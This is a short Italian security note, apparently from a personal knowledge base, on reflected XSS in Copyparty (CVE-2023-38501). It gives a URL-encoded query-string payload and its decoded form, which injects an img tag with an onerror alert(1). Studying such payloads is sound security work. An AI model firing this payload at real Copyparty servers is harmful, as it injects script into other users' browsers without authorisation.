Quartz 4

Payloads Dedicati (CVE)

1 min read

tags: payloads XSS

Reflected XSS

Vulneabilità Copyparty CVE-2023-38501

Questa vulnerabilità permette di inserire codice javascript attravento l’encoding URL del payload, ad esempio:

?k304=y%0D%0A%0D%0A%3Cimg+src%3Dcopyparty+onerror%3Dalert(1)%3E

è l’encodig URL del comando:

?k304=y <img src=copyparty onerror=alert(1)>

Graph View